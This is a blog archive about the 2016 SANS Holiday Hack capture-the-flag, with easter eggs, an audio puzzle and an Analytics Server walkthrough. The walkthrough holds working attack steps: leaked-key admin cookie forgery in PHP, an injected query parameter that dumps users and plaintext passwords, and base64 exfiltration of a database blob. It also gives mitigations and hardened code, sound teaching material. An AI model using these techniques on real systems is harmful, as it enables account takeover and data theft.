Friday, January 6, 2017

SANS Holiday Hack 2016: Awesome Write-Ups!

I read other write-ups to learn from.  People solve things in different ways.  I decided to find some other solutions and post them here, because they may help others.

https://research.kudelskisecurity.com/2017/01/06/sans-holiday-hack-challenge-2016/
http://holiday.ctf.rip/
http://l4m3rs.blogspot.com/2017/01/sans-holiday-hack-challenge-2016-santas.html
http://shhc2016.r00k.io/
http://mickeycecil.com/hackology/hh16/
http://ropgadget.com/posts/sansholidayhack_2016.html
http://ist.uwaterloo.ca/~jatestar/SANSHolidayHack2016-TESTART.pdf
http://braindiff.net/blog/sans-2016-write-up/
https://vulnsec.com/2017/SANS-Holiday-Hack-Challenge-2016/
https://reedphish.wordpress.com/2017/01/05/writeup-the-2016-sans-holiday-hack-challenge/
https://blog.ropnop.com/sans-holiday-hack-2016-writeup/
https://www.merckedsecurity.com/sans-holiday-hack-challenge-2016/
http://hypn.za.net/sans2016holidayhack/
https://techanarchy.net/2017/01/solving-the-sans-2016-holiday-hack-challenge/

Thursday, January 5, 2017

SANS Holiday Hack 2016-Extras

Extras:

The coins are silver/grey with a dark grey “W”.  Does the “W” stand for “Wars” or does the creator have an ad deal with Webroot?  Webroot is an antimalware product.  Their symbol is a green circle with a dark green “W”.  (The writer is kidding, obviously, but if you haven’t considered that, maybe you should, now?)

Santa W. Claus-wondered what the W stood for.  Maybe it’s in reference to Wodan-a German God that resembles Santa Claus.

Some of the achievements have references to pop culture:

1.21 Gigawatts is how many gigawatts are needed to power the Delorean in the Back To The Future movies.
Chess? References the movie WarGames.
The One Who Knocks is a common quote from Breaking Bad.  The founder of Counter Hack, Mr. Skoudis, is said to resemble the main character of Breaking Bad.

In the last two years of Holiday Hack Challenges, the phrase “Who is the villain.” was used.  The writer thought that it was a typo.  It wasn’t.  It was a not-so-subtle clue about who the villains are.

Is Dr. Who from Whoville?  Are Dr. Who and Cindy Lou Who related?  Are they the heads of a crime family?  Picturing the Who mob. :)  Is the speck actually a space ship that has a slight miscalculation of scale with Earth, like in Hitchhiker’s Guide to the Galaxy?

1978

Elf House 1

The fireplace secret room refers to the secret room in Counter Hack.

Elf House 2-Room 2

There is a 1977 Star Wars poster in his room depicting Darth Vader’s helmet behind Luke, who is holding a lightsaber to the sky, & Leia, C3PO, and R2D2.  The Death Star is to the left of the helmet, and X-Wings are moving into attack configuration to the left of the Death Star.

There is a talking plant on the top right side.

The Big Tree

Tom Hessman was born after 1978.  He isn’t living in his house yet in 1978.  The Big Tree is a nod to Legend of Zelda:Ocarina of Time where the main character, Link, lives in a tree surrounded by elves.  Have you found the Master Sword, yet, Mr. Hessman?

North Pole

The sign in the North Pole stating, “4351 Days Since the Last Grinch Level Event”, is in reference to when “The Grinch Who Stole Christmas” movie was released.  In 1978, it had been ~12 years since the Grinch terrorized the citizens of Whoville.  Did they calculate for leap year days?  (Yes, they did. :))  The Grinch Who Stole Christmas was released December 18th, 1966. 


There actually is a Music Discombobulator.  Seriously, search Google for it. :)

The placement of the homes and the Christmas tree in the North Pole reminds the writer of WhoVille.

Someone had an accident near Bushy Evergreen-or, Bushy had an accident.  Don’t imbibe amber, frozen Dihydrogen Monoxide.

NetWars Experience Treehouse

NetWars sure has come a long way.  The elves were playing Tic-Tac-Toe and Space Invaders.

Santa’s Office

There is a tiny TARDIS police call box on his table.  A clue about who the villain is.  This office actually looks similar to the Counter Hack Office.  The tiny TARDIS isn’t on his desk in the pictures of Counter Hack, though.  (The writer has learned that Mr. Skoudis now has a tiny TARDIS on his desk. :))

Small Treehouse

Minty Candycane is singing, “We Will Rock You” by Queen

The Corridor

It is either a nod to a strange 1970 movie short called Corridor, about a man who is stuck in a corridor, forever chasing after a woman that he’ll never get to, or it is a nod to the 2010 movie “The Corridor”.  Or, maybe it’s both?

The Clock Tower

It’s the inside of the Clock Tower in the Back to the Future series of movies.

All Over The North Pole

The 1978 elves have cute references to the things that they are studying in 2016.

Holly Evergreen:  “My aunt just gave me her famous Cran Pie recipe, which seems simple - there are only five ingredients!  But I don’t understand these instructions.  What do you mean the heat sinks?”

Sugarplum Mary:  “So, I was talking with Minty about how much I wish Santa would take me on deliveries.  I’d get to travel, to see the world, you know?  Shinny interrupts and starts going on and on about how GREAT the North Pole is, there’s so much to DO here, why would anyone want to leave and all that.  I said, “Shinny, look - everyone’s getting sick of your Localphile Intrusions.””

Alabaster Snow:  “Hey, have you seen ‘Animal House’?  What a riot.  Those guys sure know how to have fun, but it’s not exactly RESTful, eh?”

Sparkle Redberry apparently doesn’t exist in 1978, yet.

Wunorse Openslae:  “It’s the weirdest thing - I keep getting Christmas cards in the mail.  No return address, just initials: S.D.  I don’t recognize the initials, so these SD cards are a mystery.”

Minty Candycane:  “Buddy, you’re an old man poor man - pleadin’ with your eyes, gonna make you some peace some day… What?  Oh, sorry, I’ve just had that song stuck in my head all day.”

Pepper Minstix:  “Hey, I just noticed my cursive changes drastically when I’ve had a lot of coffee.  It gets a little more dynamic and harder to interpret.  Does your handwriting have a distinct Javascript, too?”

Shinny Upatree:  “Did you know I auditioned to play C3PO in Star Wars?  I tried out and completed their whole Android Application Package and everything.  I really thought I had a chance, but I got zip.”

2016

Elf House 2-Room 2

There is a new poster in the room.  It is a 2015 poster for Star Wars Episode 7, depicting the symbol for the Rebel Alliance.

North Pole

On December 24th, 2016, the sign depicting “Days Since Last Grinch Level Event” returns to 0.  The story line originally starts December 24th.  So the character starting before December 24th is a little confusing.  Time travel, eh?

Santa’s Workshop

Why is Jason a hay bale?  Jason obviously didn’t exist in 1978 either.  There’s no talking hay bale in ’78.

Why does the middle reindeer moo?

Why are there only 5 reindeer in the game that we see?  There are some mentioned in the SantaGram.apk.  Why were they leaving?  Where is Rudolph?

Why aren’t the 3 reindeer in Santa’s workshop in DFER?  Maybe they are members of Rudolph’s Red Team instead?

Why is there an elf hat on the crane?

Santa’s Workshop Train Station

When a person looks at the STATUS command, they see a nod to the movie Back To The Future.  The top speed is 88 mph.  The Flux Capacitor is Fluxing.  When they activate the train, they’ll see a screen similar to the console in Back To The Future.

Analytics Server

Has an ad that says, “Anyone reading this?”

Dungeon Game:

If one reads the engravings in the living room, it says, “This space intentionally left blank.  The implementers blame Mike Poor.” 

The dome room has a description of “elvish hacking rites”. 

Cranberry Pi Device:

In the Cranberry Pi device, there is a support website listed.  It is an actual website that says that Cranbian is the superior fruit operating system.

There are recipes that utilize cranberries as an ingredient in the device as well.

SantaGram APK

When Pepper Minstix is playing Dungeon, she decides to kick the mailbox and post about it on the SantaGram apk.
The elves seem to have an obsession with the beautiful landscape of the North Pole and animals living around the north pole-reindeer, polar bears, and white foxes.

Songs-Thanks Ninjula, these are awesome!

North Pole

Sleigh Ride

NetWars Tree House

Plump Sugar Fairies

Elf House 1 & Elf House 2

We Three Kings

North Pole-Train Station

Coming To Tizown

Small Treehouse
Driedel, Driedel, Driedel

DFER/Santa’s Workshop

Boogie Woogie Santa Claus

Santa’s Office/The Corridor/The Clock Tower

No songs.  Eerie silence.

SANS Holiday Hack 2016-Resources

Resources:

1  https://quest2016.holidayhackchallenge.com

2  SANS Pen Testing Blog:  Title:  Mining Android Secrets (Decoding Android App Resources), Author:  Jeff McJunkin,

3  SANS Pen Testing Blog:  Title:  Ghost In The Droid: Reverse Engineering Android Apps, Author:  Joshua Wright

4  YouTube:  SANS Pen Test- How To’s: Manipulating Android Applications, Presenter:  Joshua Wright
https://www.youtube.com/watch?v=mo2yZVRicW0


6  https://developer.android.com/studio/index.html


8  https://github.com/skylot/jadx


10 SANS Pen Testing Blog: Title:  Mount A Raspberry Pi File System Image, Author:  Joshua Wright

11 https://en.wikipedia.org/wiki/Zork

12 SANS Pen Test Blog: Title:  Mining Meteor, Author: Tim Medin


14 http://php.net/manual/en/wrappers.php.php

15 https://mariadb.org/learn/

As always, Google.

SANS Holiday Hack 2016-Audio File Puzzle

Audio File Puzzle

Tool:

Audacity

Operating System:

Windows 10

Each file was opened in Audacity.  The tempo was adjusted until the word or phrase could properly be heard.  

Select the Effect option on the menu at the top of the screen.  Select the Change Tempo option.  Manipulate the audio file by either putting a number in one of the fields or sliding the slide bar.  One can preview the sound by pressing the preview button.  If one clicks the OK button, they can still change it back by pressing the Edit option on the menu at the top of the screen and clicking undo.

Then the pitch was adjusted.  

Select the Effect option on the menu at the top of the screen.  Select the Change Pitch option.  This one is a little more complicated.  Adjust the pitch by changing the number in the elevator button, changing the key, changing the number in the text box, and sliding the slide bar.  The best way to learn is trial and error.  Again, one can preview the sound by pressing the preview button.  If one clicks the OK button, they can still change it back by pressing the Edit option on the menu at the top of the screen and clicking undo.

The speed was not manipulated because if one sped up the track, even a little bit, the pitch was a lot different.  It had a Chipmunk kind of sound.  It seemed easier to adjust the tempo and pitch separately.

Then the files were combined.  Open the first file.  Then open the 2nd file.  In the 2nd file, click the Edit option on the menu at the top of the screen, select the Select option, then Select All from the drop down menu that appears.  Copy the 2nd file using the little icon that looks like two papers.  Close the 2nd file.  Click back on the 1st screen.  Go to the end of the first audio, click the end to move the marker to the end, make sure that nothing is selected, then click the little icon that looks like a clipboard and a paper.  Repeat for the remaining audio files, opening each one up, copying them, closing them, and pasting them to the end of the 1st audio file screen in Audacity.  Make sure that they are in order 1>2>3>4>5>6>7.

The writer did not have much luck.  Unfortunately, the first and second audio files were tough to change.  Too slow or fast, and the phrase couldn’t be heard.  The first couple of audio files sound odd.  However, the last five sound ok.  They were manipulated enough to solve the puzzle.

Catching the Villain:

The player should log into the game at quest2016.holidayhackchallenge.com, go to the door without a terminal in The Corridor room, and type the entire phrase and punctuation, “Father Christmas, Santa Claus, or as I’ve always known him, Jeff.” into the password prompt.  The door opens.  There is a long ladder that leads up to a clock tower.  Who is standing there?  Dr. Who, of course.  He apparently didn’t like the 1978 Star Wars Holiday Special. XD

SANS Holiday Hack 2016-Analytics Server: Part Two

Analytics Server (Part 2)

Scan the https://analytics.northpolewonderland.com server with nmap.  It finds that there is a world-readable git repository located at https://analytics.northpolewonderland.com/.git/.

nmap -T4 -sC analytics.northpolewonderland.com -p 0-65535

Download the whole git repository to a computer; there is source code for each of the functions on the website.

The login.php has an easily reverse engineered cookie.  

    $auth = encrypt(json_encode([ // JSON-encode the following, then pass it to the encrypt function
      'username' => $_POST['username'],
      'date' => date(DateTime::ISO8601),
    // This is just the username and Date/Time. :D
    ]));

    setcookie('AUTH', bin2hex($auth));  // convert the binary value of $auth to hexadecimal, set the cookie to this value

The crypto calculation is in crypto.php, which is available in the .git directory as well.  The key is stored as a constant in crypto.php.  This is the crypto code:

<?php
  define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

  function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
  }

  function decrypt($data) {
    return mcrypt_decrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
  }
?>

Slightly change the login code to print the value that the administrator cookie would be.

<?php
  define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

  function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
  }

  # Same structure as login.php, with the username fixed instead of read from $_POST
  $auth = encrypt(json_encode([
    'username' => 'administrator',
    'date' => date(DateTime::ISO8601),
  ]));

  # Hex-encode the result the same way login.php does before setting the cookie
  $auth = bin2hex($auth);
  print $auth;
?>

Use an offline/online IDE to see the print statement.  If you have php on a Linux box, you can run it on there to see what happens.  The administrator cookie is:  
82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d86e573b965cc9b654ab1494d6763a10a65b71176884152.

After getting the cookie, add a cookie for the analytics website.  There is a plugin called “Cookies Manager+” in Firefox.  After manipulating the cookie in “Cookies Manager+”, navigate to the website, and be magically logged in as administrator.  That is called session cookie stealing.
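
As an added example (not code from the challenge or from the original write-up), here is one way the AUTH cookie could be built so that a leaked source tree does not hand over the key and an edited value is rejected: the key comes from the environment, the value carries an HMAC-SHA256 tag, and an expiry is enforced.  The AUTH_COOKIE_KEY variable name, the token layout and the one-hour lifetime are assumptions.

```php
<?php
// Added example: integrity-protected AUTH token with the key kept out of the repository.
// AUTH_COOKIE_KEY, the "hex(payload).hex(mac)" layout and the TTL are assumptions.

function load_key(): string {
    $hex = getenv('AUTH_COOKIE_KEY');
    if ($hex === false || strlen($hex) < 64 || strlen($hex) % 2 !== 0 || !ctype_xdigit($hex)) {
        throw new RuntimeException('AUTH_COOKIE_KEY must be at least 32 random bytes, hex encoded');
    }
    return hex2bin($hex);
}

function issue_token(string $username, string $key, int $now, int $ttl = 3600): string {
    // Same idea as login.php (JSON with the username), plus an expiry the server checks.
    $payload = json_encode(['username' => $username, 'exp' => $now + $ttl]);
    $mac = hash_hmac('sha256', $payload, $key);   // tag over the exact payload bytes
    return bin2hex($payload) . '.' . $mac;
}

function verify_token(string $token, string $key, int $now): ?string {
    $parts = explode('.', $token);
    if (count($parts) !== 2) {
        return null;
    }
    [$hexPayload, $mac] = $parts;
    if ($hexPayload === '' || strlen($hexPayload) % 2 !== 0 || !ctype_xdigit($hexPayload)) {
        return null;
    }
    $payload = hex2bin($hexPayload);
    // Verify the tag before parsing anything; hash_equals compares in constant time.
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $mac)) {
        return null;
    }
    $claims = json_decode($payload, true);
    if (!is_array($claims) || !isset($claims['username'], $claims['exp'])) {
        return null;
    }
    if (!is_string($claims['username']) || !is_int($claims['exp']) || $claims['exp'] < $now) {
        return null;
    }
    return $claims['username'];
}

// Demo with a constructed key; in deployment the variable is set outside the code base.
putenv('AUTH_COOKIE_KEY=' . bin2hex(random_bytes(32)));
$key = load_key();
$now = time();

$token = issue_token('guest', $key, $now);
var_dump(verify_token($token, $key, $now));           // valid token: username comes back

// Payload rewritten to another username while the old tag is kept: rejected.
$edited = bin2hex(json_encode(['username' => 'administrator', 'exp' => $now + 3600]))
        . '.' . explode('.', $token)[1];
var_dump(verify_token($edited, $key, $now));

// Same token presented after its lifetime: rejected.
var_dump(verify_token($token, $key, $now + 7200));
```

The tag only helps while the key stays secret, which is why it is read from the environment here instead of being defined in a file that ships with the site.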

There are three areas of interest on the site.  “Query”, “View”, and “Edit”.   

“Query” queries the database based on certain parameters, and displays those parameters to the screen.  There is also an option to save a report to view later on the “Query” screen.  This saves the results of the query to the query column in the database.
“View” allows a person to view a previously saved query/report.
“Edit” allows one to change the name and description of a report.
“Query” and “View” didn’t initially appear to be vulnerable to SQL Injection because of the way that the queries are made in the programs that are executed to display the database query and reports to the screen:  query.php and view.php.

The edit.php program, the program used to edit the name and description of reports on the “Edit” page, did have a weakness.  It has four parameters: “query”, “id”, “name”, and “description”.  The “query” parameter could be manipulated.

In order to use the “Edit” area of the website, one must already have a “report ID”.  

The “report ID” can be obtained by querying something on the “Query” area of the website, and clicking the “Save as report” checkbox.  The report ID is displayed on the screen for someone to view later, using the “View” area of the website or edit later using the “Edit” part of the website. 

Copy the report ID.  Navigate to the “Edit” area of the website.  Capture the network traffic.  In this case, Developer Tools on Firefox was used.  “Edit” the report that was just queried. Paste the report ID into the report ID text box, pick any name and type it into the name textbox, then type a description and put it into the description part. 

In the captured traffic, manipulate the query parameter to “SELECT%20*%20FROM%20audio”.  (It's url encoded because the query is being made in the address bar.)  That query is placed into the database in the “query” column, along with the id, name, and description.  In order to see that “SELECT%20*%20FROM%20audio” query in action, one has to view the edited report ID.

If one navigates to the “View” area of the website, and puts in the report ID that was manipulated in the “Edit” area of the website, it shows all the files in the audio database because the view.php program “sees” the “SELECT%20*%20FROM%20audio” query in the query part of the report database and executes it as an sql query.

So I didn't explain this well when I submitted my write-up-the query column where id = the report id  in the reports database is what is being manipulated.  The programmer failed to catch any queries that didn't fit what he/she intended.  The programmer should not have gotten everything from that row.  Should have been SELECT id, name, description FROM reports, that way that the query couldn't be manipulated.  Then every item in that grouping should be escaped & sanitized, not just the id.  Seen this where the programmer was trying to save a few lines of code.  That SELECT * FROM audio overwrites the original results in the query column.  Then the view.php interprets it as SQL.  

One can see both audio files because the “SELECT%20*%20FROM%20audio” query selects every audio file in the database.  When working with a real database, one may not want to do this particular query because it returns every record in the database.  It depends on one’s goals.  

If the query is manipulated, by doing the above steps, to “SELECT%20*%20FROM%20users”, one can get all of the usernames and passwords.  The usernames and passwords happen to be stored plain text.  The administrator password is KeepWatchingTheSkies.

There are different ways to get the audio file out of the database.  In this case, the easiest solution seemed to be to base64 encode the file.  (The file blob was stored in the database in a column called “mp3”.)  Manipulate the query by taking the same steps as above, except, change the query to SELECT%20TO_BASE64(mp3)%20FROM%20audio%20WHERE%20id%20%3D%20%273746d987-b8b1-11e6-89e1-42010af00008%27

Navigate to the “View” area of the website and the discombobulatedaudio7.mp3 file is displayed on the screen in base64. 

Select all of the text in the TO_BASE64(mp3) display box-not everything on the screen.  Then paste that text into a text editor and save it as base64encodedmp3.  Note:  There is no period.  The mp3 isn’t decoded yet, so it can’t be played. 

There are different methods of decoding a base64 file.  For some reason “base64 -d” did not like this base64 encoding.  In this case, python was used.  The command (Python 2 syntax) is python -c 'print open("base64encodedmp3", "rb").read().decode("base64")' > discombobulatedaudio7.mp3.  The mp3 should now be playable.

Mitigation:

Don’t allow public access to a git repository.
Don’t store keys/credentials in variables in a program.
Don’t have a cookie algorithm that is easy to reverse engineer-ie don’t use a proprietary algorithm to calculate a cookie-use known/trusted solutions to calculate a cookie value.
Don’t allow anyone to have access to experimental pages-except the people who are developing them.
PHP’s mysql_escape_string is not a replacement for properly validating input.  It has been deprecated and only protects against \x00 (null character), \n (line feed character), \r (carriage return character), \, ', " and \x1a (EOF).  It does not protect against the more creative people that find other ways to input those characters.  The creator of these php programs should read the php website, the MariaDB website, and OWASP to keep track of up-to-date secure programming advice.  Currently, best practice is prepared queries.
Restrict access from one database to another.
Restrict access to certain database functions from the website.
Don’t store passwords plain-text.

edit.php

<?php
  # This should be the first require
  require_once('this_is_html.php');
  require_once('db.php');

  # Don't allow anybody to access this page (yet!)
  restrict_page_to_users($db, []);

  require_once('header.php');

  if(!isset($_GET['id'])) {
?>
    <div class="alert alert-warning"><strong>Warning!</strong> This is experimental.</div>
    <form class="form-horizontal">
      <div class="form-group">
        <label for="id" class="col-sm-2 control-label">ID</label>
        <div class="col-sm-6">
          <input type="text" class="form-control" name="id" id="id" placeholder="XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX">
        </div>
      </div>
      <div class="form-group">
        <label for="name" class="col-sm-2 control-label">Name</label>
        <div class="col-sm-6">
          <input type="text" class="form-control" name="name" id="name" placeholder="New Name">
        </div>
      </div>
      <div class="form-group">
        <label for="description" class="col-sm-2 control-label">Description</label>
        <div class="col-sm-6">
          <input type="text" class="form-control" name="description" id="description" placeholder="New Description">
        </div>
      </div>
      <div class="form-group">
        <div class="col-sm-offset-2 col-sm-6">
          <button type="submit" class="btn btn-default">Edit</button>
        </div>
      </div>
    </form>

<?php
  }
  else
  {
    $result = mysqli_query($db, "SELECT * FROM `reports` WHERE `id`='" . mysqli_real_escape_string($db, $_GET['id']) . "' LIMIT 0, 1"); # looks for existing report id, selects all items in the row, including the query.
    if(!$result) {
      reply(500, "MySQL Error: " . mysqli_error($db));  # if it can’t find the id or the query is invalid, an error message is displayed to the page.
      die();
    }
    $row = mysqli_fetch_assoc($result);

    # Update the row with the new values
    $set = [];
    foreach($row as $name => $value) {
      print "Checking for " . htmlentities($name) . "...<br>";
      if(isset($_GET[$name])) {
        print 'Yup!<br>';
        $set[] = "`$name`='" . mysqli_real_escape_string($db, $_GET[$name]) . "'"; # places the value of $name in $set variable
      }
    }

    $query = "UPDATE `reports` " .
      "SET " . join($set, ', ') . ' ' .
      "WHERE `id`='" . mysqli_real_escape_string($db, $_REQUEST['id']) . "'";
    print htmlentities($query); #update reports set <name from form> where id = <id from form>

    $result = mysqli_query($db, $query); # the value of query in the “report” database can be changed here by manipulating the query parameter in the web request.  Notice this isn’t being escaped &/or sanitized.
    if(!$result) {
      reply(500, "SQL error: " . mysqli_error($db));
      die();
    }

    print "Update complete!";
  }
?>
<?php require_once('footer.php'); ?>

view.php

<?php
  # This should be the first require
  require_once('this_is_html.php');
  require_once('db.php');

  restrict_page_to_users($db, ['guest']);

  require_once('header.php');

?> 
  <form class="form-inline">
    <div class="form-group">
      <label for="id" class="h3">Query UUID</label>
      <input type="text" class="form-control input-lg" style="width: 40rem" id="id" name="id" placeholder="XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX">
      <button type="submit" class="btn btn-primary">View</button>
    </div>
  </form>
  <br/>
<?php

  if(isset($_GET['id'])) {
    $result = mysqli_query($db, "SELECT * FROM `reports` WHERE `id`='" . mysqli_real_escape_string($db, $_GET['id']) . "' LIMIT 0, 1");  # It gets everything from reports, including the query column of the report database, where the id matches the manipulated query.
    if(!$result) {
      reply(500, "MySQL Error: " . mysqli_error($db));
      die();
    }

    $row = mysqli_fetch_assoc($result);
    if(!$row) {
      reply(404, "Report not found!");
      die();
    }
?>
  <!--
  <ul>
    <li>ID: <?= htmlentities($row['id']); ?></li>
    <li>Name: <?= htmlentities($row['name']); ?></li>
    <li>Description: <?= htmlentities($row['description']); ?></li>
  </ul>
  -->
  <div class="panel panel-primary">
    <div class="panel-heading">
      <h3 class="panel-title">Details</h3>
    </div>
    <div class="panel-body">
      <div class="row">
        <div class="col-xs-2 col-sm-2 text-muted text-right">ID</div>
        <div class="col-xs-8 col-sm-9"><?= htmlentities($row['id']); ?></div>
      </div>
      <div class="row">
        <div class="col-xs-2 col-sm-2 text-muted text-right">Name</div>
        <div class="col-xs-8 col-sm-9"><?= htmlentities($row['name']); ?></div>
      </div>
      <div class="row">
        <div class="col-xs-2 col-sm-2 text-muted text-right">Details</div>
        <div class="col-xs-8 col-sm-9"><?= htmlentities($row['description']); ?></div>
      </div>
    </div>
  </div>

  <?php
    format_sql(query($db, $row['query']));  # The value in the query column of the report database, where the id that was manipulated is selected, is then interpreted as sql.  The query isn’t sanitized before being put in here.
  }
require_once('footer.php'); 
?>
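
The write loop from edit.php, reduced to a runnable comparison with a hardened form.  This is an added example, not the challenge's code: an in-memory SQLite database through PDO stands in for the MariaDB reports table, and the function names, the sample row and the request array are constructed for illustration.  Values are bound in both functions, which shows that the flaw is which columns the request may write, not only how the values are quoted.

```php
<?php
// Added example: mass-assignment in the edit.php loop versus an allowlisted update.
// Assumes the pdo_sqlite extension; SQLite only stands in for the real database.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE reports (id TEXT PRIMARY KEY, name TEXT NOT NULL,
                                 description TEXT, query TEXT NOT NULL)');

// Constructed sample data.
const REPORT_ID   = '00000000-0000-0000-0000-000000000001';
const SAVED_QUERY = 'SELECT COUNT(*) FROM app_launch_reports';
const EDITABLE    = ['name', 'description'];   // the only columns the Edit form offers

function reset_row(PDO $db): void {
    $db->exec('DELETE FROM reports');
    $ins = $db->prepare('INSERT INTO reports (id, name, description, query) VALUES (?, ?, ?, ?)');
    $ins->execute([REPORT_ID, 'launches', 'daily count', SAVED_QUERY]);
}

function stored_query(PDO $db): string {
    $q = $db->prepare('SELECT query FROM reports WHERE id = ?');
    $q->execute([REPORT_ID]);
    return (string) $q->fetchColumn();
}

// Same shape as edit.php: every column of the fetched row becomes writable
// when the request carries a parameter with that column's name.
function update_any_column(PDO $db, array $request): void {
    $sel = $db->prepare('SELECT * FROM reports WHERE id = ? LIMIT 1');
    $sel->execute([$request['id']]);
    $row = $sel->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return;
    }
    $set = [];
    $args = [];
    foreach ($row as $col => $unused) {
        if (isset($request[$col])) {
            $set[] = "\"$col\" = ?";
            $args[] = $request[$col];
        }
    }
    $args[] = $request['id'];
    $db->prepare('UPDATE reports SET ' . implode(', ', $set) . ' WHERE id = ?')->execute($args);
}

// Hardened: column names come from code, never from the row or the request.
function update_allowed_columns(PDO $db, array $request): bool {
    $id = $request['id'] ?? '';
    if (!is_string($id) || !preg_match('/^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$/i', $id)) {
        return false;
    }
    $set = [];
    $args = [];
    foreach (EDITABLE as $col) {
        if (isset($request[$col]) && is_string($request[$col])) {
            $set[] = "$col = ?";
            $args[] = $request[$col];
        }
    }
    if ($set === []) {
        return false;
    }
    $args[] = $id;
    $stmt = $db->prepare('UPDATE reports SET ' . implode(', ', $set) . ' WHERE id = ?');
    $stmt->execute($args);
    return $stmt->rowCount() === 1;
}

// The form fields plus the extra "query" parameter described in the write-up.
$request = ['id' => REPORT_ID, 'name' => 'renamed', 'description' => 'edited',
            'query' => 'SELECT * FROM audio'];

reset_row($db);
update_any_column($db, $request);
echo 'edit.php-style loop : ', stored_query($db), PHP_EOL;

reset_row($db);
update_allowed_columns($db, $request);
echo 'allowlisted update  : ', stored_query($db), PHP_EOL;
```

Because view.php runs whatever the query column holds, that column should only ever be written by server-side code.
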

Here is the relevant database information:

sprusage.sql

-- MySQL dump 10.13  Distrib 5.7.16, for Linux (x86_64)
--
-- Host: localhost    Database: sprusage
-- ------------------------------------------------------
-- Server version 5.7.11-0ubuntu6

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `reports` --database table being manipulated by edit.php
--

DROP TABLE IF EXISTS `reports`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `reports` (
  `id` varchar(36) NOT NULL,
  `name` varchar(64) NOT NULL,
  `description` text,
  `query` text NOT NULL, -- query column in database, this is the column being manipulated by the edit.php program when an extra parameter is added.
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `reports`
--

LOCK TABLES `reports` WRITE;
/*!40000 ALTER TABLE `reports` DISABLE KEYS */;
/*!40000 ALTER TABLE `reports` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `users`
--

DROP TABLE IF EXISTS `users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `users` (
  `uid` int(11) NOT NULL,
  `username` varchar(128) NOT NULL,
  `password` varchar(128) NOT NULL,
  PRIMARY KEY (`uid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

DROP TABLE IF EXISTS `audio`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `audio` (
  `id` varchar(36) NOT NULL,
  `username` varchar(32) NOT NULL,
  `filename` varchar(32) NOT NULL,
  `mp3` MEDIUMBLOB NOT NULL, -- can be base64 encoded and exfiltrated
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `users` --The passwords were stored plain text.
--

LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2016-11-21 20:57:13

GRANT SELECT, INSERT, UPDATE ON `sprusage`.`reports` TO 'sprusage'@'localhost';
GRANT SELECT, INSERT, UPDATE ON `sprusage`.`app_launch_reports` TO 'sprusage'@'localhost';
GRANT SELECT, INSERT, UPDATE ON `sprusage`.`app_usage_reports` TO 'sprusage'@'localhost';
GRANT SELECT ON `sprusage`.`users` TO 'sprusage'@'localhost';

GRANT SELECT ON `sprusage`.`audio` TO 'sprusage'@'localhost';